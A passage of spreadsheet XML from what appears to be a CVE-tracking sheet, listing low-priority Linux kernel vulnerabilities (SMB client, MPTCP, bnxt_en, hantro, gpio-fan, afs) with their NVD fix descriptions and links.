smb: client: honor forceuid/forcegid when mapping SIDs to uid/gid
When the administrator mounts with forceuid or forcegid (uid=/gid=
mount options), they expect all files to appear owned by the specified
user/group.  However, several code paths unconditionally called
sid_to_id() to overwrite cf_uid/cf_gid with server-provided values,
ignoring the administrator's explicit override:
  - smb311_posix_info_to_fattr() (stat via POSIX extensions)
  - cifs_posix_to_fattr() (readdir via POSIX extensions)
  - parse_sec_desc() (CIFS ACL ownership mapping)
This allowed an untrusted server to dictate local file ownership even
when the mount was configured to force specific uid/gid values.
Fix all three call sites to check CIFS_MOUNT_OVERR_UID and
CIFS_MOUNT_OVERR_GID before calling sid_to_id(), following the
same pattern already used by cifs_unix_basic_to_fattr() for unix
extensions.</t>
        </is>
      </c>
      <c r="T507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97561</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97563</t>
        </is>
      </c>
      <c r="D508" s="5" t="inlineStr"/>
      <c r="E508" s="5" t="inlineStr"/>
      <c r="F508" s="5" t="inlineStr"/>
      <c r="G508" s="5" t="inlineStr"/>
      <c r="H508" s="5" t="inlineStr"/>
      <c r="I508" s="5" t="inlineStr"/>
      <c r="J508" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K508" s="5" t="inlineStr"/>
      <c r="L508" s="5" t="inlineStr"/>
      <c r="M508" s="5" t="inlineStr"/>
      <c r="N508" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O508" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P508" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q508" s="5" t="inlineStr"/>
      <c r="R508" s="5" t="inlineStr"/>
      <c r="S508" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: reject out-of-bounds DataOffset in CIFSSMBRead()
The SMB1 synchronous read helper CIFSSMBRead() validates the server's
DataLength against CIFSMaxBufSize and the caller's count, but never
validates DataOffset. The copy source is formed as
	&amp;pSMBr-&gt;hdr.Protocol + le16_to_cpu(pSMBr-&gt;DataOffset)
and memcpy()'d for DataLength bytes with no check that the
[DataOffset, DataOffset + DataLength) range lies within the response
actually received from the server.
A malicious or compromised SMB1 server can return a response carrying
an in-range DataLength and a large DataOffset, driving the source
pointer past the end of the response buffer. The memcpy() then copies
adjacent kernel heap into the caller's read buffer (information
disclosure), or reads unmapped memory and oopses (denial of service).
SMB1 is not negotiated by default; reaching this code requires an
explicit vers=1.0 mount.
Both DataOffset and the received response length recorded in
rsp_iov.iov_len are relative to the start of the SMB header, so reject
the response unless DataOffset + DataLength fits within that length,
using overflow-safe arithmetic, before forming the source pointer.
The response length has been validated by the previous patch, so the
DataOffset and DataLength fields can be read safely here.
While here, make data_length unsigned. It holds a length derived from
unsigned on-the-wire fields and is only ever compared against unsigned
quantities; print it with %u accordingly, and add __func__ to the
cifs_dbg() calls in this function.</t>
        </is>
      </c>
      <c r="T508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97563</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97564</t>
        </is>
      </c>
      <c r="D509" s="5" t="inlineStr"/>
      <c r="E509" s="5" t="inlineStr"/>
      <c r="F509" s="5" t="inlineStr"/>
      <c r="G509" s="5" t="inlineStr"/>
      <c r="H509" s="5" t="inlineStr"/>
      <c r="I509" s="5" t="inlineStr"/>
      <c r="J509" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K509" s="5" t="inlineStr"/>
      <c r="L509" s="5" t="inlineStr"/>
      <c r="M509" s="5" t="inlineStr"/>
      <c r="N509" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O509" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P509" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q509" s="5" t="inlineStr"/>
      <c r="R509" s="5" t="inlineStr"/>
      <c r="S509" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: reject userspace cifs.idmap descriptions
cifs.idmap key descriptions carry authority-bearing fields (owner and
group SIDs and uid/gid values in "os:"/"gs:"/"oi:"/"gi:" form) that the
cifs.idmap upcall helper treats as kernel-originating inputs.  Unlike
its sibling cifs.spnego, the cifs.idmap key type has no vet_description
hook, so userspace can create keys of this type through
request_key(2)/add_key(2) and supply those fields without CIFS origin.
A request_key(2) call with a non-NULL callout then drives a root
usermodehelper upcall (/sbin/request-key -&gt; cifs.idmap) that consumes
the unvetted description in root context.
Only accept cifs.idmap descriptions while CIFS is using its private
root_cred to request the key.  id_to_sid()/sid_to_id() already run
under override_creds(root_cred), so the kernel-originated path is
unaffected.
This mirrors commit 3da1fdf4efbc ("smb: client: reject userspace
cifs.spnego descriptions"), which applied the same restriction to
cifs.spnego.</t>
        </is>
      </c>
      <c r="T509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97564</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97565</t>
        </is>
      </c>
      <c r="D510" s="5" t="inlineStr"/>
      <c r="E510" s="5" t="inlineStr"/>
      <c r="F510" s="5" t="inlineStr"/>
      <c r="G510" s="5" t="inlineStr"/>
      <c r="H510" s="5" t="inlineStr"/>
      <c r="I510" s="5" t="inlineStr"/>
      <c r="J510" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K510" s="5" t="inlineStr"/>
      <c r="L510" s="5" t="inlineStr"/>
      <c r="M510" s="5" t="inlineStr"/>
      <c r="N510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O510" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P510" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q510" s="5" t="inlineStr"/>
      <c r="R510" s="5" t="inlineStr"/>
      <c r="S510" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: reject short READ responses in CIFSSMBRead()
CIFSSMBRead() reads DataLengthHigh, DataLength and DataOffset out of
the READ_RSP returned by the server without first checking that a
whole READ_RSP was actually received. The length of the response is
recorded in rsp_iov.iov_len, but nothing constrains it to be at least
read_rsp_size before those fields are dereferenced.
A malicious or compromised SMB1 server can return a response shorter
than the READ_RSP header, so that parsing the header itself reads past
the end of the receive buffer. SMB1 is not negotiated by default;
reaching this code requires an explicit vers=1.0 mount.
Reject the response unless it is at least read_rsp_size bytes long.</t>
        </is>
      </c>
      <c r="T510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97565</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97566</t>
        </is>
      </c>
      <c r="D511" s="5" t="inlineStr"/>
      <c r="E511" s="5" t="inlineStr"/>
      <c r="F511" s="5" t="inlineStr"/>
      <c r="G511" s="5" t="inlineStr"/>
      <c r="H511" s="5" t="inlineStr"/>
      <c r="I511" s="5" t="inlineStr"/>
      <c r="J511" s="5" t="inlineStr"/>
      <c r="K511" s="5" t="inlineStr"/>
      <c r="L511" s="5" t="inlineStr"/>
      <c r="M511" s="5" t="inlineStr"/>
      <c r="N511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O511" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P511" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q511" s="5" t="inlineStr"/>
      <c r="R511" s="5" t="inlineStr"/>
      <c r="S511" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mptcp: pm: kernel: drop pending ADD_ADDR when removing ID0
The in-kernel MPTCP path manager can leave a stale ADD_ADDR announcement
entry alive when removing the id 0 endpoint. This happens because the id 0
removal path does not tear down pending announcements, unlike the non-zero
id path.
When the PM later reselects id 0 after adding another signal endpoint, it
finds the stale anno_list entry and hits WARN_ON_ONCE(mptcp_pm_is_kernel())
in mptcp_pm_announced_alloc().
Root cause: asymmetry between removal paths.
- Non-zero id path: mptcp_nl_remove_subflow_and_signal_addr() calls
  mptcp_pm_remove_announced() to clean up.
- Id 0 path: mptcp_nl_remove_id_zero_address() skips cleanup entirely.
Fix by making the id 0 path symmetric: call mptcp_pm_announced_remove()
and decrement add_addr_signaled before queuing the RM_ADDR.
Subtle detail: signal endpoints are stored in anno_list with port 0, but
msk_local carries the connection's local port. In other words, entries
linked to ID0 paths should have port == 0. A follow-up patch will ensure
that. mptcp_pm_announced_remove() uses use_port=true for comparison. So
clear the port before the lookup.</t>
        </is>
      </c>
      <c r="T511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97566</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97567</t>
        </is>
      </c>
      <c r="D512" s="5" t="inlineStr"/>
      <c r="E512" s="5" t="inlineStr"/>
      <c r="F512" s="5" t="inlineStr"/>
      <c r="G512" s="5" t="inlineStr"/>
      <c r="H512" s="5" t="inlineStr"/>
      <c r="I512" s="5" t="inlineStr"/>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr"/>
      <c r="L512" s="5" t="inlineStr"/>
      <c r="M512" s="5" t="inlineStr"/>
      <c r="N512" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O512" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P512" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q512" s="5" t="inlineStr"/>
      <c r="R512" s="5" t="inlineStr"/>
      <c r="S512" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mptcp: prevent race between disconnect() and rtx
Sashiko noted that the two event can race, leading to inconsistent
status. Prevent the race using the synchronous timer stop operation.</t>
        </is>
      </c>
      <c r="T512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97567</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97568</t>
        </is>
      </c>
      <c r="D513" s="5" t="inlineStr"/>
      <c r="E513" s="5" t="inlineStr"/>
      <c r="F513" s="5" t="inlineStr"/>
      <c r="G513" s="5" t="inlineStr"/>
      <c r="H513" s="5" t="inlineStr"/>
      <c r="I513" s="5" t="inlineStr"/>
      <c r="J513" s="5" t="inlineStr"/>
      <c r="K513" s="5" t="inlineStr"/>
      <c r="L513" s="5" t="inlineStr"/>
      <c r="M513" s="5" t="inlineStr"/>
      <c r="N513" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O513" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P513" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q513" s="5" t="inlineStr"/>
      <c r="R513" s="5" t="inlineStr"/>
      <c r="S513" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mptcp: syncookies: remember the request backup flag
Instead of using an uninitialised bit when copying the info in
subflow_ulp_clone().
To fix this, no need to extend the join_entry structure: backup is
coming from struct mptcp_subflow_request_sock, only one bit. Do the same
here by using one bit for both.</t>
        </is>
      </c>
      <c r="T513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97568</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97569</t>
        </is>
      </c>
      <c r="D514" s="5" t="inlineStr"/>
      <c r="E514" s="5" t="inlineStr"/>
      <c r="F514" s="5" t="inlineStr"/>
      <c r="G514" s="5" t="inlineStr"/>
      <c r="H514" s="5" t="inlineStr"/>
      <c r="I514" s="5" t="inlineStr"/>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr"/>
      <c r="L514" s="5" t="inlineStr"/>
      <c r="M514" s="5" t="inlineStr"/>
      <c r="N514" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O514" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P514" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q514" s="5" t="inlineStr"/>
      <c r="R514" s="5" t="inlineStr"/>
      <c r="S514" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Prevent queue stop with deferred completions
When the driver receives a burst of packets, it can mark a BD with the
NO_CMPL bit to defer completions. The expectation is that the last
packet in the ring will have this bit unset and the completion generated
by that packet will cleanup that packet and the ones preceding it. This
helps to reduce the number of completions fired.
The suppressed completions are controlled by the driver and the number
of packets with suppressed completions scales with the size of the ring.
SW USO packets, on the other hand, have an upper bound on the maximum
number of BDs which can be consumed which does not scale with the ring
size.
So, for small rings it is possible that: a burst of packets is handed to
the driver, the driver defers completions for all of the packets because
the number of free descriptors stays above the threshold in the driver.
Then, a USO packet arrives, but the number of BDs available is not
enough and the USO code exits early.
In this case, you end up in a state where the ring is full of packets
with their completions suppressed, which can cause the queue to stop and
never be restarted.
Assuming default CONFIG_MAX_SKB_FRAGS, this is only possible for small
rings (&lt;= 457 descriptors, below the driver default value) when
a burst of packets fills the ring, followed by a large USO packet that
can't fit. For larger rings, the delta between the completion
suppression threshold and the BDs required for SW USO is large enough
that completions will fire and this case is unreachable.
This issue was pointed out by Sashiko and while it seems fairly unlikely
given that the queue size must be small to trigger this, it is indeed
possible.
Fix this by tracking the last BD which deferred completions and
centralizing the logic for deciding when to ring the doorbell. The NO_CMPL
bit is now cleared in bnxt_txr_db_kick(), so every doorbell site is
covered, including the SW USO early exit. This guarantees the ring always
ends in a BD which generates a completion to clean it and wake the queue.</t>
        </is>
      </c>
      <c r="T514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97569</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97571</t>
        </is>
      </c>
      <c r="D515" s="5" t="inlineStr"/>
      <c r="E515" s="5" t="inlineStr"/>
      <c r="F515" s="5" t="inlineStr"/>
      <c r="G515" s="5" t="inlineStr"/>
      <c r="H515" s="5" t="inlineStr"/>
      <c r="I515" s="5" t="inlineStr"/>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr"/>
      <c r="L515" s="5" t="inlineStr"/>
      <c r="M515" s="5" t="inlineStr"/>
      <c r="N515" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O515" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P515" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q515" s="5" t="inlineStr"/>
      <c r="R515" s="5" t="inlineStr"/>
      <c r="S515" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Propagate TPA buffer allocation failures in bnxt_queue_mem_alloc()
bnxt_alloc_one_tpa_info_data() returns -ENOMEM as soon as one allocation
fails. This leaves the remaining rxr-&gt;rx_tpa[] entries zeroed.
bnxt_queue_mem_alloc() discards that return value, so the partially
initialized ring is installed by bnxt_queue_start().
Since the agg_id is picked by the hardware and bnxt_alloc_agg_idx maps
it to a SW index in rxr-&gt;rx_tpa[], it is possible that an uninitialized
slot can be chosen which would hand a zero DMA address to the device.
Fix this by checking the return value of bnxt_alloc_one_tpa_info_data
and unwinding, freeing the ring buffers.</t>
        </is>
      </c>
      <c r="T515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97571</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97572</t>
        </is>
      </c>
      <c r="D516" s="5" t="inlineStr"/>
      <c r="E516" s="5" t="inlineStr"/>
      <c r="F516" s="5" t="inlineStr"/>
      <c r="G516" s="5" t="inlineStr"/>
      <c r="H516" s="5" t="inlineStr"/>
      <c r="I516" s="5" t="inlineStr"/>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr"/>
      <c r="L516" s="5" t="inlineStr"/>
      <c r="M516" s="5" t="inlineStr"/>
      <c r="N516" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O516" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P516" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q516" s="5" t="inlineStr"/>
      <c r="R516" s="5" t="inlineStr"/>
      <c r="S516" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Propagate RX ring init failures in bnxt_init_nic()
bnxt_init_rx_rings() returns an error when bnxt_alloc_one_rx_ring()
fails, but bnxt_init_nic() discards that return value and calls
bnxt_init_chip(), which enables TPA.
If an allocation fails, this could leave rxr-&gt;rx_tpa[] partially zeroed
and TPA would be enabled over an array with zeroed entries. This would
lead to a zeroed DMA address being handed out if the agg_idx is
translated to a SW index at a zeroed entry.
Fix this by propagating the error out of bnxt_init_nic(). Both callers
already check its return value and unwind with bnxt_free_skbs() and
bnxt_free_mem(), which tolerate a partially initialized RX ring.</t>
        </is>
      </c>
      <c r="T516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97572</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97574</t>
        </is>
      </c>
      <c r="D517" s="5" t="inlineStr"/>
      <c r="E517" s="5" t="inlineStr"/>
      <c r="F517" s="5" t="inlineStr"/>
      <c r="G517" s="5" t="inlineStr"/>
      <c r="H517" s="5" t="inlineStr"/>
      <c r="I517" s="5" t="inlineStr"/>
      <c r="J517" s="5" t="inlineStr"/>
      <c r="K517" s="5" t="inlineStr"/>
      <c r="L517" s="5" t="inlineStr"/>
      <c r="M517" s="5" t="inlineStr"/>
      <c r="N517" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O517" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P517" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q517" s="5" t="inlineStr"/>
      <c r="R517" s="5" t="inlineStr"/>
      <c r="S517" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Don't free the live ring's TPA state on queue restart failure
bnxt_queue_mem_alloc() shallow copies the live RX ring into the clone:
  memcpy(clone, rxr, sizeof(*rxr));
the code currently clears pointers that the clone owns (such as
rx_agg_bmap), but rx_tpa and rx_tpa_idx_map are left pointing at memory
of the live ring that was cloned.
If an allocation failure happens later and the err_free_tpa_info label
is taken, the live ring's memory can be freed while still in use.
Fix this by initializing the clone's pointers to NULL to prevent live
ring state from being freed inadvertently.</t>
        </is>
      </c>
      <c r="T517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97574</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97581</t>
        </is>
      </c>
      <c r="D518" s="5" t="inlineStr"/>
      <c r="E518" s="5" t="inlineStr"/>
      <c r="F518" s="5" t="inlineStr"/>
      <c r="G518" s="5" t="inlineStr"/>
      <c r="H518" s="5" t="inlineStr"/>
      <c r="I518" s="5" t="inlineStr"/>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr"/>
      <c r="L518" s="5" t="inlineStr"/>
      <c r="M518" s="5" t="inlineStr"/>
      <c r="N518" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O518" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P518" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q518" s="5" t="inlineStr"/>
      <c r="R518" s="5" t="inlineStr"/>
      <c r="S518" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: verisilicon: hantro: bound G2 HEVC tile loop to the buffer capacity
prepare_tile_info_buffer() writes one entry per tile into the tile_sizes
DMA buffer, sized for a grid equal to the PPS uAPI array capacity. Use the
bounded v4l2_hevc_pps_num_tile_columns() / v4l2_hevc_pps_num_tile_rows()
helpers so the loops stay inside the buffer.</t>
        </is>
      </c>
      <c r="T518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97581</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97582</t>
        </is>
      </c>
      <c r="D519" s="5" t="inlineStr"/>
      <c r="E519" s="5" t="inlineStr"/>
      <c r="F519" s="5" t="inlineStr"/>
      <c r="G519" s="5" t="inlineStr"/>
      <c r="H519" s="5" t="inlineStr"/>
      <c r="I519" s="5" t="inlineStr"/>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr"/>
      <c r="L519" s="5" t="inlineStr"/>
      <c r="M519" s="5" t="inlineStr"/>
      <c r="N519" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O519" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P519" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q519" s="5" t="inlineStr"/>
      <c r="R519" s="5" t="inlineStr"/>
      <c r="S519" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwmon: (gpio-fan) Fix use-after-free in alarm work
fan_alarm_irq_handler() queues fan_data-&gt;alarm_work, but nothing
cancels it.  fan_alarm_notify() dereferences fan_data and its hwmon
device.  On unbind, devres frees the interrupt, which only waits for
the handler itself, and then releases the hwmon device and fan_data,
so a pending fan_alarm_notify() can run after those frees.
Replace INIT_WORK() with devm_work_autocancel(), registered before
devm_request_irq().  The devres cleanup then frees the interrupt
first, so no new work can be queued, and cancels the work while
fan_data and the hwmon device are still alive.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="T519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97582</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97585</t>
        </is>
      </c>
      <c r="D520" s="5" t="inlineStr"/>
      <c r="E520" s="5" t="inlineStr"/>
      <c r="F520" s="5" t="inlineStr"/>
      <c r="G520" s="5" t="inlineStr"/>
      <c r="H520" s="5" t="inlineStr"/>
      <c r="I520" s="5" t="inlineStr"/>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr"/>
      <c r="L520" s="5" t="inlineStr"/>
      <c r="M520" s="5" t="inlineStr"/>
      <c r="N520" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O520" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P520" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q520" s="5" t="inlineStr"/>
      <c r="R520" s="5" t="inlineStr"/>
      <c r="S520" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
afs: Fix double-unmap of directory block
Fix afs_edit_dir_remove() to use a cleanup function to unmap the block
pointed to by afs_dir_iter::block if it's left pointing to something rather
than manually kunmapping the blocks.  Manually kunmapping without clearing
iter.blocks can result in a double-kunmap if afs_dir_find_block() is called
twice in a row (which would be the case if the block being modified is not
first in the hash chain).</t>
        </is>
      </c>
      <c r="T520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97585</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97586</t>
        </is>
      </c>
      <c r="D521" s="5" t="inlineStr"/>
      <c r="E521" s="5" t="inlineStr"/>
      <c r="F521" s="5" t="inlineStr"/>
      <c r="G521" s="5" t="inlineStr"/>
      <c r="H521" s="5" t="inlineStr"/>
      <c r="I521" s="5" t="inlineStr"/>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr"/>
      <c r="L521" s="5" t="inlineStr"/>
      <c r="M521" s="5" t="inlineStr"/>
      <c r="N521" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O521" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P521" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q521" s="5" t="inlineStr"/>
      <c r="R521" s="5" t="inlineStr"/>
      <c r="S521" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
afs: Fix missing kunmap in afs_dir_search_bucket()
Fix afs_dir_search_bucket() to kunmap the block it's using in the "bad:"
path.</t>
        </is>
      </c>
      <c r="T521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97586</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97587</t>
        </is>
      </c>
      <c r="D522" s="5" t="inlineStr"/>
      <c r="E522" s="5" t="inlineStr"/>
      <c r="F522" s="5" t="inlineStr"/>
